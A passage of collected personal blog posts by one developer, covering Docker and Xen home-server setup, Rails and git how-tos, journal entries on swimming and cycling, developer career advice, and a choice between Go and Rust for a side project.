It wasn't immediately obvious how to set up the networking. This was the network config that worked in the end (after ifdown/ifup, also tested with full reboot):
```
$ cat /etc/network/interfaces
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
auto xenbr0
iface xenbr0 inet dhcp
bridge_ports enp1s0
# The primary network interface
auto enp1s0
iface enp1s0 inet manual
#iface enp1s0 inet dhcp
```
## Docker
Seeing as docker is well and truly coming to windows it's time I got better at this so, for this and also better isolation and security I'll try and set up as many of the services I want to run as I can through docker.
First test case was [transmission-bt](https://transmissionbt.com/) which I run to be a good citizen and help seed [Linux Mint ISOs](https://www.linuxmint.com/download.php) using my [A&A unmetered upload](https://aa.net.uk/broadband-home1.html).
[Searching for transmission on docker hub](https://hub.docker.com/search/?isAutomated=0&isOfficial=0&page=1&pullCount=1&q=transmission&starCount=0), I didn't want the vpn one, I'm not pirating movies and my ISP doesn't do stupid filtering/shaping tricks on torrents. I chose the next most popular: [https://hub.docker.com/r/linuxserver/transmission/](https://hub.docker.com/r/linuxserver/transmission/)
To install and run it:
```
$ sudo -i
# useradd -r -s /sbin/nologin transmission
# id transmission
id=999(transmission) gid=999(transmission) groups=999(transmission)
# cd /var
# mkdir transmission
# cd transmission
# mkdir config downloads watch
# chown transmission:transmission .
# docker create --name=transmission \
-v /var/transmission/config/:/config \
-v /var/transmission/downloads/:/downloads \
-v /var/transmission/watch/:/watch \
-e PGID=999 -e PUID=999 -e TZ="Europe/London" \
-p 9091:9091 -p 51413:51413 -p 51413:51413/udp \
linuxserver/transmission
# docker start transmission
# docker logs -f transmission
```
useradd ref: [http://askubuntu.com/questions/29359/how-to-add-user-without-home](http://askubuntu.com/questions/29359/how-to-add-user-without-home)
Once that was done I could see the transmission web UI at `http://dom1vm:9091/`. Hurrah.
## syncthing
[https://store.docker.com/community/images/linuxserver/syncthing](https://store.docker.com/community/images/linuxserver/syncthing)
Same deal with folders and users, then:
`# docker create --name=syncthing -v /var/syncthing/config/:/config -v /var/syncthing/data/:/data -e PGID=998 -e PUID=998 -p 8384:8384 -p 22000:22000 -p 21027:21027/udp linuxserver/syncthing`
## Start on boot
```
docker update --restart=unless-stopped transmission
docker update --restart=unless-stopped syncthing
```
[http://stackoverflow.com/a/37479753/10245](http://stackoverflow.com/a/37479753/10245)
## Todo
* [nextcloud](https://nextcloud.com/) - has an iOS app that syncthing doesn't yet, might also have better selective sync
* <https://store.docker.com/community/images/wonderfall/nextcloud>
* plex server
* <https://www.plex.tv/>
## Further reading
* <https://forum.level1techs.com/t/dexter-kanes-ultra-paranoid-encrypted-nas-completed/98340>
<file_sep>---
title: Remote code interview pairing tools
layout: post
---
Things that you could use to do simple coding exercises in the new world of remote everything.
* [CodeInterview.io](https://codeinterview.io/) - $5/interview or $55/month
* [CodeSandbox.io](https://codesandbox.io/)
* [Cyber-dojo](https://cyber-dojo.org/creator/home) - free for non-commercial, set your own price for commercial!
* [VSCode live share](https://marketplace.visualstudio.com/items?itemName=MS-vsliveshare.vsliveshare-pack) works well, it can do voice as well.
* Zoom/hangouts/meet/skype etc. built-in screen sharing and whatever coding setup they already use.
Thanks to my friends at eSynergySolutions for the suggestions, recorded here because the internet has a better memory than me.
<file_sep>---
layout: post
title: Running sdv in docker
date: 2017-08-13 20:35:14.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/08/13/running-sdv-in-docker/"
---
Just bought a shared server with [bytemark](https://www.bytemark.co.uk/). (£10/month), Installed vanilla ubuntu 16.04LTS server using the control panel (virtually one-click).

(Love the cancel button text!)
Ssh'd in, created my own user to use with sudo instead of root. Ran the following, and immediately had a copy of sdv listening on the internet.
```
sudo apt install tmux docker docker-compose
sudo adduser tim docker
# logout & reconnect to get new group to take effect
wget https://raw.githubusercontent.com/timabell/sdv-docker/master/docker-compose.yml
```
and then for the magic:
```
tim@sdvweb:~$ docker-compose up
Pulling sdv (timabell/sdv:latest)...
latest: Pulling from timabell/sdv
d5c6f90da05d: Pull complete
1300883d87d5: Pull complete
c220aa3cfc1b: Pull complete
2e9398f099dc: Pull complete
dc27a084064f: Pull complete
eb1a4736b68c: Pull complete
0706cf350247: Pull complete
1d0ac78e96a5: Pull complete
Digest: sha256:9003a79f019b3ee16e7c6324afd275b4535f867602e63db317e430528e2a6771
Status: Downloaded newer image for timabell/sdv:latest
Creating tim_sdv_1
Attaching to tim_sdv_1
sdv_1 | ./sdv-linux-x64 -listenOn 0.0.0.0 -port 8080 -driver sqlite -db /data/Chinook_Sqlite_AutoIncrementPKs.sqlite
sdv_1 | 2017/08/13 19:14:44 Sql Data Viewer v0.4; Copyright 2015-2017 <NAME> <<EMAIL>>
sdv_1 | 2017/08/13 19:14:44 ## This pre-release software will expire on: 2017-10-01 00:00:00 +0000 UTC, contact <EMAIL> for a license. ##
sdv_1 | 2017/08/13 19:14:44 Starting server on http://0.0.0.0:8080/ - Press Ctrl-C to kill server.
```
And that's it, listening on the internet!

Any changes I make will be to the [docker and compose files](https://hub.docker.com/r/timabell/sdv/), resulting in trivially easy to repeat deployments, making the server completely throwaway. Huzzah! Docker is awesome.
I've also bought a domain for the product, but haven't set much up on it yet: <http://www.sqldataviewer.com/>
Next up, getting nginx reverse proxy to provide ssl. And finishing the refactor I was in the middle of to get data types to behave, and finishing the automated regression tests I'd just started (needed for reliable multi rdbms support), and finding my market, and marketing the product, and doing more features, and build the marketing automation to drive sales, etc etc. Not too much to do then! Your support would be appreciated, if you're interested make sure you [sign up to the mailing list now](https://www.getdrip.com/forms/70504364/submissions/new)!
If you're wondering why docker matters more generally then listen to this podcast episode: Hanselminutes: Practical Containers for Developers with Aja Hammerly <http://www.hanselminutes.com/default.aspx?ShowID=18514>
<file_sep>---
layout: post
title: Getting rails 4 up and running with rbenv on Ubuntu 13.10
date: '2013-12-04T23:16:00.003Z'
author: <NAME>
tags:
modified_time: '2013-12-05T10:09:30.811Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6247915904489237488
blogger_orig_url: https://timwise.blogspot.com/2013/12/getting-rails-4-up-and-running-with.html
---
_Brain dump warning!_
This is a follow up to
[Installing ruby 2 + Rails 4 on Ubuntu 12.04 LTS](/2013/05/13/installing-ruby-2-rails-4-on-ubuntu/)
and is just a list of steps needed to get a clean install of Ubuntu up to speed
with an existing site.
* Install rbenv to manage ruby versions
* [https://github.com/sj26/rbenv-install](https://github.com/sj26/rbenv-install)
* `git clone https://github.com/sstephenson/rbenv.git ~/.rbenv`
* Install ruby-build to manage installation of ruby versions into rbenv
* [https://github.com/sstephenson/ruby-build](https://github.com/sstephenson/ruby-build)
* `git clone https://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build`
* For convenience install dotmatrix - this will set up the rbenv environment correctly, amongst other things
* clone [https://github.com/timabell/dotmatrix](https://github.com/timabell/dotmatrix)
* run bin/install
* restart any running terminal(s) to get rbenv
* get a project (includes a .ruby-version file for rbenv, and a Gemfile for bundle)
* `git clone <EMAIL>:timabell/symbol-library.git`
* `sudo apt-get install libssl-dev libreadline-dev`
* readline is needed for rails console, and has to be installed before ruby. If you've already installed ruby then just re-run rbenv install and it will overwrite the existing build with a version with readline support. ref: [http://vvv.tobiassjosten.net/ruby/readline-in-ruby-with-rbenv/](http://vvv.tobiassjosten.net/ruby/readline-in-ruby-with-rbenv/)
* `rbenv install x.x.x-xxxx`
* autocompletes, yay!
* .. or better still reads from .ruby-version I think so you can just run `rbenv install` if you are in the project folder
* `gem install bundler`
* from the right directory so done for right ruby version
* rbenv rehash
* `bundle`
* will install all the gems for the project
* ~~don't `sudo apt-get install rbenv`~~ ~ doesn't provide sufficiently up to date ruby
* ~~don't `gem install rails --version 4.0.2 --no-ri --no-rdoc`~~ ~ don't need this when you have a gem file with rails in it, bundle will do it for you
* `sudo apt-get install nodejs`
* for javascript runtime (rails server throwing an error without this)
* `bundle exec rails server`
* `bundle exec rails console`
* needs readline (see above)
Other stuff I like in my install
* dotmatrix bin/vimbundles
* includes vim-rails and friends
* full list [https://github.com/timabell/dotmatrix/blob/master/bin/vimbundles.sh#L45](https://github.com/timabell/dotmatrix/blob/master/bin/vimbundles.sh#L45)
* console colours from bin/solarize.sh in dotmatrix/bin
* tmux
This is mostly for my own reference but maybe it'll help someone else out.
<file_sep>---
title: "Things + lycra swimwear & goggles"
date: 2004-01-29
slashdot_url: https://slashdot.org/journal/60096/things--lycra-swimwear-goggles
---
<p>Given up counting lengths. Working on technique now (think - "I like your style!"). That's not to say I've missed any sessions, in fact quite the opposite, I've been four times this week. Met up with the Triathletes on Monday, swam tues am practicing what I'd been taught, back with the triathletes wed eve (after drama tues night, first rehearsal) got more help from Mark (thnks mark, much appreciated) and could feel I was getting closer, if not faster, then usual thur am session for more practice, with some degree of success. Been at jongleurs tonight for laughs and cavorting, a good night was had by all (I think).</p>
<p>Back to town for proper session tomorrow with A and others, should be messy<nobr> </nobr>;)</p>
<file_sep>---
title: "Commuting by Bike"
date: 2004-07-12
slashdot_url: https://slashdot.org/journal/77152/commuting-by-bike
---
<p>Hello.</p>
<p>I just got in from work. This is the first time I've ridden to my new job. It's 9.9 miles each way, and reasonably flat except for a few sharp rises and drops. All this fitness stuff is really starting to pay off, I averaged 18.5mph on the way to work (32 mins) and 19mph on the way home (31 mins). That's by far the best speeds I have ever attained. I did once manage 20mph but it was over a much shorter distance and I probably had the wind with me (parp).</p>
<p>My cycling has been really important to me ever since my first trike. I let it slip once not long after I got a car, laziness ruled and I didn't go out for ages. The final straw was one christmas when I went for a short ride to relieve the boredom. I didn't even make it a mile up the road, and I was so annoyed with myself that I haven't stopped since.</p>
<file_sep>---
title: How to be a highly valued developer
layout: post
---
## Learn to code... then get endlessly better at coding...
1. Be good at coding.
2. The end.
3. ... but wait, there's more.
There is truly endless training available for getting better at the craft of being a developer:
* For programming languages:
* There's online courses, in-person courses, video training, coding Katas, live programming playgrounds, free courses, reaaaaly expensive courses, or you could just sit with language documentation and an editor and compiler and just learn by doing.
* There's training for all the mainstream programming languages such as C#, Javascript or Ruby
* Or maybe you could [learn more about languages that might give you a new angle on things](https://www.amazon.com/Seven-Languages-Weeks-Programming-Programmers/dp/193435659X) such as Erlang, Haskell or Lisp and then bring those concepts back to the current language of your project making you a better and more well rounded programmer.
* Then there's the frameworks such as Rails, NodeJS, ASPNET etc which are all huge things to learn in there own right. Again there's many ways to learn these tools of the trade such as:
* Read the docs
* Take a Pluralsight / Coursera / course
* Try building something and do a lot of stackoverflow searching
* Pair with someone else or work on a team and learn together and from each other
I could probably go on all morning thinking of all the ways to learn more about the pure skill of programming, or "sharpening the saw" as <NAME> likes to call it.
Becoming a programmer, then becoming excellent at the raw skills of programming is of course something that's been done to death, because it's a fundamental skill. You can't be a programmer at all by just learning SCRUM if you still don't to know how to write an `if-else` statement. I don't have much more to add to what's out there on this, if you want to learn to code or want to be a better programmer you don't even need to spend money these days, just go and do it. I don't mind lending a hand if you get stuck, but it's not like I hold some magical secret as a programmer. I am not a member of some Pratchett-esque "Ancient Guild of Programmers" with access to the only true source of ancient's algorithms; it's all out there, it's just tricky to wrap your head round turning a pile of ASCII into stuff that works, and then trickier still to make it maintainable and easy to iterate on as needs evolve change. This is a critical foundation of the skill and not something to be skipped. In fact if you're a programmer reading this you'd do well to read the [article by <NAME> titled "Being Glue"](https://noidea.dog/glue) (also a very good talk if you prefer video) before paying too much heed to the next section.
There is however a reason I am taking up your time in an era of all-the-information-you-can-eat. There are other aspects to being a truly *great* programmer that go beyond ingenious use of raw code. Having been around for a while I've started to see patterns in what makes for great teams that are a pleasure to work in and who get things done. I want to get that captured here so that good programmers can learn how to be one of those sought-after people, and to help leaders and managers know what to filter for when building great teams.
## Beyond coding - being a *really* great developer
* Leave ego at the door.
* Be humble.
* Speak up when you think things need to be different, even if it's not a programmer thing.
* Focus on success/failure of the project above individual productivity.
* Focus on small iterative delivery
* Not just knowledge of agile structures such as scrum, xp and kanban but a drive to see them done well and iterated on.
* Ability and desire to educate upwards - you are the expert, help those above and around you understand.
* Belief that team output is more important than personal output.
* Ability to separate ones own ego from a technical opinion - so when an idea is debated it is not viewed as a personal attack.
* Constant iteration in personal productivity, e.g. learning to touch-type, creating aliases for common commands. It's not so much that this makes you faster, it's more about what it says about the attitude you bring to everything. If you don't constantly improve your own things, would you constantly improve your client/company things? These things pay compound returns, particularly by freeing up mental space for the next thing.
* A drive for simplicity.
* An avoidance of "clever" - valuing future maintainability and legibility for other programmers over your own programmer ego. (This one is straying into pure programmer skills but I mention it as it's not something you'll get from a course on C#).
* Consider how code and systems could behave not just under perfect "happy path" conditions, but how it would behave under unexpected conditions, failure, bad input, maybe even when in the hands of a hostile attacker. Would it be catastrophic? Would it be easy to troubleshoot and fix? Would it give a hacker a leg-up to even greater evil powers?
* Empathy for your team.
* Empathy for your users, including a11y needs.
* A desire to be in contact with end-users (whether or not the organisation is supportive of this, I love that GDS style teams have dedicated "user research" functions to connect programmers to end users).
* Know when it's important to polish and when to just ship fast.
A lot of this is down to personal growth, which takes a lot of work. I've recommended some books that are relevant to this in [A book list for my children](/2021/01/25/a-book-list-for-my-children/), and there's more scattered around my [goodreads list](https://www.goodreads.com/review/list/50628592?shelf=read). If you're a programmer then work on these things. If you're a hiring manager then be sure to filter for these things, you can't train them in time it takes to run a project, and maybe not even over an entire employment.
<file_sep>---
title: "funky flash game"
date: 2005-07-30
slashdot_url: https://slashdot.org/journal/113239/funky-flash-game
---
<p>Don't let the little dude catch your cursor!</p>
<p><a href="http://www.onemorelevel.com/games/avoider.html">http://www.onemorelevel.com/games/avoider.html</a></p>
<p>brought to you by b3ta.com (of course) issue 191</p>
<file_sep>---
title: "Question: where are we at with dynamic static sites?"
layout: post
---
So tell me about dynamic static sites...
# History lesson
I've been a software engineer primarily creating dynamic websites for a loooong
time. First there was a server with html files and caching proxies. Then there
were scripting extensions (cgi, php, asp-classic etc) to spice up your html,
then there were full mature web frameworks for all the things (asp.net mvc,
ruby on rails etc).
But then we got traffic and libraries and platforms and sdks and databases in
the cloud and everything became slow. 😞
So we added CDNs to make it all fast, and cache invalidation to make the
engineers cry.
Now what's old is new again, but with a twist, static sites pre-generated by
dynamic code (such as my blog created with jekyll). We get the benefits of old
- CDNs love static sites; caching and proxying work again; and cache
invalidation still makes us cry.
The new saviour is serverless (functions as a service) so that we can still add
dynamic stuff to these static sites.
Yes I can go read endless articles about how to *do* all this stuff, and turn
my CV and skills on their head so I can sell the hot new thing. But what I
actually want to know now is....
# What are *you* doing with dynamic static sites?
Have you tried it? As a pet project? As a commercial project?
Did it go well? Is it the new future or is it just for niche needs?
I feel like because this is all *sooo* new, that it's not clear yet how well
adopted this stuff is or will be, and how much of the old is being thrown out
and rewritten.
---
# My opinion...
...based on good knowledge of tech but not based on any actual experience is that
it depends entirely on the type of thing you are building:
* Low volume intranet/extranet style sites - don't bother, asp.net / rails is
fast enough, and it will cost you more to develop a blended static/dynamic
thing.
* E-commerce: totally worth it because you can handle any spike in traffic to
your front page, and serverless lets you seamlessly scale the dynamic parts.
Caveat **it will be more expensive to build** but that's okay because money in
is proportional to how many customers you can serve well.
* Government or other highly accessible services - don't do it. You can't meet
the accessibility needs if half your site's critical behaviour is done in
client-side javascript with calls off to serverless functions in the cloud. I
might be wrong about this, I hope I am. Maybe it's possible but just hard.
* Your blog and other traditionally CMS driven sites: just [use jekyll for your
own blog](/2019/06/24/setting-up-a-jekyll-blog/) and put it on github pages.
For more complicated commercial sites static site generation is a big win in
terms of technical complexity reduction, reliability improvements and speed
improvements for users. Which static site generator you use will depend on your
organisation's internal needs. (Can everyone use git? Or do you need a UI for
people to type in? How much money to you have?)
* Etc. (there are sooo many reasons for tech, I've just picked a few)
----
# Speak out now
Before you go, comment below.
What have your experiences been with the shift to dynamic-static sites? Have
you done any of it? Do you think I'm right/wrong about any of this?
<file_sep>---
layout: post
title: Nightly Shutdown, a new product from Proven Works
date: '2008-07-03T19:30:00.006Z'
author: <NAME>
tags:
- software
- shameless plug
- sys admin
- active directory
- microsoft
modified_time: '2008-07-03T19:59:11.428Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2690488523107244834
blogger_orig_url: https://timwise.blogspot.com/2008/07/nightly-shutdown-new-product-from.html
---
Congratulations to <NAME>, a good friend of mine, and his company
[Proven Works](http://www.provenworks.com/) on getting the [first
release](http://joelmansford.wordpress.com/2008/07/02/new-utility-to-shutdown-your-network-pcs-at-night/)
of [Nightly Shutdown](http://www.nightlyshutdown.com/) out of the door.
This looks to be a great product and hopefully will make system administrators'
lives easier and greener. It's a utility for ensuring that the computers are
off when you want them to be, and can be deployed through active directory
making the sys admin's life easier. There's a 10 PC free trial available, so
check it out at the [download
page](http://www.nightlyshutdown.com/DownloadRequest.aspx).
[](http://www.nightlyshutdown.com/)
Without even looking I know this will be a good
product and fantastically well supported. Best of luck to all at Proven Works,
and to all the potential users and buyers out there, don't forget to check it
out and provide any feedback you can.
<file_sep>---
layout: post
title: sharing work between computers with a usb flash drive and git
date: '2008-05-29T23:36:00.007Z'
author: <NAME>
tags:
- howto
- backup
- dev
- linux
- git
- oss
- svn
modified_time: '2008-06-04T17:18:17.112Z'
thumbnail: http://farm4.static.flickr.com/3180/2500350904_0b0c2a44f3_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-4719348621403422584
blogger_orig_url: https://timwise.blogspot.com/2008/05/sharing-work-between-computers-with-usb.html
---
I couldn't find anything exactly matching this on the net when I was figuring
it out, so here's what I did.
This is working against a remote svn (subversion) server, but applies even
without one.
On the first computer, grab your git working copy from svn with git-svn clone
(or clone a git repo, or just start a new one).
mkdir ~/project.git
cd ~/project.git
git-svn clone svn://project-server/trunk
git repack #for good measure
Plugin your usb flash drive/stick/external harddrive, I'll presume it's a
vfat/fat32/fat16 formated device mounted at `/media/flash`. Create an empty
repository on the drive, I'll use a bare one as there's no need to keep the
working copy as well.
mkdir /media/flash/project.git
git --bare init /media/flash/project.git
Then add the flash drive git repo as a remote source in your local git repo.
"flash" is the name I've given to the remote branch reference, you can call it
whatever you like.
git remote add flash /media/flash/project.git
If you push immediately it will fail (as I discovered) because fat doesn't
support the execute flag on files, so all the hooks are automatically active.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/2500350904/"><img
src="https://live.staticflickr.com/3180/2500350904_0b0c2a44f3.jpg" alt="Photo of blue parrot"></a>
</div>
I deleted all the hooks as I wasn't planning on using them, this may be wrong
so no promises, but it seems ok so far for me. So remove the hooks with:
rm /media/flash/project.git/hooks/*
Then push your current local copy to the flash drive with:
git push flash
This will copy all your committed work onto the flash drive, even if you
haven't pushed it upstream to the svn server with `git-svn dcommit` yet. Bonus!
It won't copy any of your branches across though, so you if you want them you
can add those independently with:
git push flash mybranch
Now move over to the second computer and plug the flash drive in. I'm making
the same assumptions on paths and devices. Do another completely independent
svn checkout as above:
mkdir ~/project.git
cd ~/project.git
git-svn clone svn://project-server/trunk
git repack #for good measure
Then add the flash drive's repo to the git repo on the second pc and pull all
changes from the flash drive, optionally including any branches:
git remote add flash /media/flash/project.git
git pull flash master
git pull flash mybranch #if you like
When you've committed changes to git or pulled the latest changes from svn on
either pc, you can then update the flash drive with the simple command:
git push flash
Which pushes all your changes on your master branch on to the flash drive. You
are now ready to run the pull command on the other computer to get back in
sync:
git pull flash master
If you don't push changes to the flash drive before committing to svn then
things will be very simple. If you push changes to the flash drive, and then
commit them to the svn server you will need to do a little more work. This is
because when you run "git svn dcommit" it pushes your latest git commits to the
svn server, deletes your locally committed changes, and then fetches them back
from the svn server. This means that git won't recognise your local changes as
being the same as the ones on the flash drive because they have different
commit message and SHA1 hash. Attempting to push to the flash drive fails with
the message `! [rejected] master -> master (non-fast forward)` as the old copy
of the commits are still there.
To resolve this you need to throw away the matching set of changes on the flash
drive. To do this you can use git reset as follows, where `HEAD~1` should be
the number of commits you need to throw away (eg `HEAD~3` to throw away the
last 3 commits that were pushed to the flash drive):
cd /media/flash/project.git
git --bare log #to see how many changes don't have svn information
git --bare reset HEAD~1
You can then push your changes as above.
cd ~/project.git
git push flash
I've glossed over subtleties with fetch vs pull, but hopefully you will find
this useful.
This howto makes use of git's ability to pull from multiple sources, and I've
found that git quite happily copes with changes that were checked in to svn
coming via the flash drive, even when later running "git-svn rebase".
Please do comment or contact me with any problems, errors, extra info and
feedback, and let me know if it was useful.
<file_sep>---
title: "swimming"
date: 2004-04-02
slashdot_url: https://slashdot.org/journal/67200/swimming
---
<p>It's been two weeks, but I was back in the pool for training this week, and I cycled there (admittedly not entirely through choice - temporary absence of car was prime motivation). Swam 0.9km in the hour and surprisingly not that tired.</p>
<p>Unrelatedly, just so you know my current desktop at work is picture of v cute <1 month old kittens.</p>
<p>Never got any further with usb key thing, too much else on, and being a true programmer I'd hate to actually finish something once I've started it!</p>
<p>And J says <a href="http://www.dlink.co.uk/pages/products/DBT-900AP.asp">bluetooth for LAN</a></p>
<file_sep>---
layout: post
title: Creating a blogroll
date: '2007-09-03T20:13:00.001Z'
author: <NAME>
tags:
- howto
modified_time: '2009-12-26T16:09:04.738Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-555759280771564498
blogger_orig_url: https://timwise.blogspot.com/2007/09/creating-blogroll.html
---
Update 11th Sep 2007:
xsession responded to my support request, and the [opml](http://www.timwise.co.uk/blogroll.opml) file is now served, complete with the correct mime type.
* * *
Update 26th Dec 2009
Now on a linux host so no mime type issues now.
Podcast list added: [podcasts.opml](http://www.timwise.co.uk/podcasts.opml).
Now styled with custom xslt file [opml.xsl](http://www.timwise.co.uk/opml.xsl).
* * *
As people may want to see my rss and podcast subscriptions, I have created a blogroll for you.
I've started with an [OPML](http://en.wikipedia.org/wiki/OPML) file, created by hand and uploaded to my web host. Unfortunately my web host won't (currently) serve the ".opml" file extension so I've had to use .txt.
so [http://www.timwise.co.uk/blogroll.opml](http://www.timwise.co.uk/blogroll.opml) became [http://www.timwise.co.uk/blogroll.opml.txt](http://www.timwise.co.uk/blogroll.opml.txt)
I then validated the file with [http://validator.opml.org/](http://validator.opml.org/)
I then added my feed to [http://share.opml.org/](http://share.opml.org/) so you can now see the list at [http://share.opml.org/viewsharedfeeds/?user_id=7189](http://share.opml.org/viewsharedfeeds/?user_id=7189)
In the opml I've separated podcasts and news feeds, but share.opml doesn't use this info.
There is some [controversy](http://www.isolani.co.uk/blog/semanticweb/OpmlTheXmlFormatWithNoFriends) over opml, but hell, it does the job. We can all upgrade when a better alternative goes mainstream.
Useful references:
[http://www.kbcafe.com/rss/?guid=20051003145153](http://www.kbcafe.com/rss/?guid=20051003145153)
[http://www.rss-tools.com/opml-generators.htm](http://www.rss-tools.com/opml-generators.htm)
[http://www.bioneural.net/2005/10/09/iblog-opml-bloglines-reading-list/](http://www.bioneural.net/2005/10/09/iblog-opml-bloglines-reading-list/)
[http://nayyeri.net/archive/2007/02/17/create-a-blogroll-from-opml-files.aspx](http://nayyeri.net/archive/2007/02/17/create-a-blogroll-from-opml-files.aspx)
<file_sep>---
title: "mmmm cake"
date: 2004-11-01
slashdot_url: https://slashdot.org/journal/88851/mmmm-cake
---
<p>I've got the first cake I've ever made in the oven right now.<nobr> </nobr>:D</p>
<p>I've been flat out with work for ages and am knackered. I still haven't managed to get all my clocks running on GMT yet. I arrived in an empty field an hour early on Sunday - doh!</p>
<p>Does anyone know of anyone looking to share a place in Reading?</p>
<p>I got a childrens book in my shreddies the other day. At first I thought bah, humbug, another irritating marketing tactic. But now I've finished the cereal, and extracted the book from the packaging and am enjoying it! I guess it's inifitely better than the biodegrade-proof waste of hydrocarbons they normally include.</p>
<p>Oooh, five mins till my cake's done.<nobr> </nobr>:)<br>It's risen...<br>I'll let you know how it tastes.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: "Guitar Book"
date: 2004-09-22
slashdot_url: https://slashdot.org/journal/84543/guitar-book
---
<p>I would appear to have finally managed to order <a href="http://www.amazon.co.uk/exec/obidos/ASIN/0825694000/026-8427743-1791615">Solo Guitar Playing</a> from Amazon.co.uk. Hopefully it'll turn up soon. I've not been impressed with Amazon, it took me three attempts to persuade them to put my order through properly. I wonder whether their site is broken in <a href="http://www.mozilla.org/">Mozilla</a>. It was quite a change from the good experiences I had years ago when ordering from them. I was close to actually using a real bookshop. I asked them to find my old account, but it I received no response at all. Hrmmm.</p>
<p>Anyway, nuff ranting. I'm looking forward to continuing the excercises in the book (by <NAME>) which is very well written and doesn't make learning any harder than it needs to be. I borrowed a copy off my neighbour, thank you neighbour, "but that's a breach of copyright" I hear you cry... Look I bought the book. OK? Sharing works. End of story. If I didn't buy it then stopping someone showing it to me doesn't exactly make me more inclined to buy it. I'll be expecting a letter from the digital rights people any minute! Oops, that sounded like another rant.</p>
<p>Hrm.</p>
<file_sep>---
title: "Splash"
date: 2003-12-04
slashdot_url: https://slashdot.org/journal/54069/splash
---
<p>Yay! I did TWENTY! lengths of the pool this morning. It's a 25 metre pool so that's half a kilometer! Did take 3/4 hour mind, with lots of panting between lengths.</p>
<file_sep>---
title: "Bloody Banks"
date: 2004-01-13
slashdot_url: https://slashdot.org/journal/58139/bloody-banks
---
<p>Cahoot just managed to cost me 80 pounds, in a day.</p>
<p>==============================<br>To: <EMAIL><br>Subject: Banking error.</p>
<p>Hello,</p>
<p>You've bounced three transactions on my current account and charged me £60 all on the 12th Jan. Despite there being a transfer to cover the whole amount made on the same day.</p>
<p>I am very annoyed and will be leaving cahoot unless this is resolved to my satisfaction.</p>
<p>Please refund the £60 to my account immediately and make arrangements to cover charges I will receive for the three failed transactions, plus a small sum to cover the expenses I will incur in dealing with BT, Egg & Student Loans Co.</p>
<p>Egg will charge £20.<br>I have yet to contact BT and Student Loans Co, but doubtless sorting this out will be a problem.</p>
<p>Yours</p>
<p><NAME>.</p>
<p>--------------------<br>Edit:<br>After much email ping pong they finally refunded the 60 quid they charged me. Still moving banks tho.</p>
<file_sep>---
title: Choosing a programming language for timslist
layout: post
---
I'm working on a new thing, [timslist.uk](https://timslist.uk/), and of course with the first thing out the way (a domain), the second thing is the choice of programming language. Excuse me, I'll be back in a few years with an answer.
## Goals
I primarily want something that I can keep hosting costs low as possible while it has no income, for as long as possible, something that doesn't become an unmaintainable nightmare, and something that I would be able to get decent programmers to work on in the future without creating a new unmaintainable mess.
## Hypothesis
The hypothesis is that I can hack away on the side, build something that compiles to web assembly for sharing logic with front-end, use manifests to make it installable on mobile until I can justify full mobile apps (which are *very* high maintenance thanks to the api & app store churn) and have infinite runway while I figure out what works thanks to the consulting.
## The big question, GoLang or Rust?
Currently I'm considering GoLang and Rust, which are both languages that would give me the ability to serve vast user numbers with relatively low costs. (I can dream right? Maybe I'll even succeed...)
I'm giving this *a lot* of thought because should I succeed then this is probably one of the hardest things to change amidst the chaos of a runaway startup; and the choice has very real consequences.
(P.s. In case anyone wonders, I'm happy to carry on consulting in C# land and hack on other things outside of client time.)
## What do I want out of a language?
1. Something I'll enjoy working on in the short to medium term while it's just me building it.
2. Something that would allow me to attract great collaborative coders (not rock stars) to work on it with or for me later on when I can show revenue.
3. Something that will keep hosting costs as low as possible to maximize my pre-revenue ability to scale the user base while supporting it with contracting.
4. Something I can run server and client side (with WASM) to avoid duplication of code that I can ill afford.
5. Something that allows me to build up advanced abstractions that allow me to operate and pivot without re-writing reams of code..
6. Something that has enough good quality library support that I'm not going to drown in unfinished or missing dependencies.
7. Ideally something that might allow me to build some unique technical advantages over the competition.
### GoLang
I wrote [schema explorer](https://github.com/timabell/schema-explorer) in GoLang which was educational. I still appreciate the simplicity of the language, and having worked on C# 2.0 that was still simple I appreciate the value of being able to pick up anyone's code and refactor it into shape, something no longer possible in the sprawling language that is C# 10 or whatever they've got to now. On the other hand I was left with the feeling that abstractions would be less high-level resulting in more code to wrangle for the same amount of functionality; something I can ill afford as a lone programmer at this stage.
### Rust
[Rust has been the most loved language for 7 years in a row](https://survey.stackoverflow.co/2022/#overview) which must mean something, right? It is low level and fast, but it also doesn't shy away from high-level abstractions that I appreciate as a programmer. To give myself a better idea as to what it's like to work in I've been working on [gitopolis](https://github.com/timabell/gitopolis/), this has helped me get beyond the (excellent) docs. So far it's, erm, hard!
I want to enjoy this project, and I also want it to be written in something that attracts great coders for many years just in case this is successful. The kind of coders that are more than just writers of reams of mediocre code.
My main worry with Rust (and to a lesser extent GoLang) is the incompleteness of libraries, frameworks and integrations; leading to endless toil and dead ends that I just don't have the engineering resources to contend with.
#### Popularity curves & engineering talent
Ruby has seen a rise and fall in popularity with the best coders as the basecamp-induced excitement faded and the kool kids moved to the next big thing, probably something with types or functional programming.
C# has a vast army of not-very-good programmers (who create endless projects for me to improve at work).
It's hard to tell where GoLang and Rust fit in these curves.
I suspect GoLang is likely to bore the better coders in the end, and although it will prevent the less good coders hurting themselves quite so badly I'm not sure I want that crowd.
Rust is definitely a sharper and harder to use tool, which is the kind of thing that attracts the hot talent. But equally, when they get bored of the challenge they move on like locusts to the next hot thing, leaving the businesses that chose Rust behind with a dearth of talented people to work on their existing code.
I can't tell if Rust will buck that trend and be sustainably cool, or if the cool coders will all head off to the next big thing by the time I have need of many engineers.
I'm also worried that Rust will attract the C++ over-engineering crowd who will write incredible code that no-one else can comprehend while the business goes out of business due to not shipping anything users actually care about. (Sometimes called "write-only code"!)
### Articles of persuasion
[Endler's article on GoLang vs Rust](https://endler.dev/2017/go-vs-rust/) makes me think I will *enjoy* building in Rust more, which is important for a project that I plan to be solo on for a long time, and have to want to work on it day in day out regardless of the challenges of life to stand a chance of success
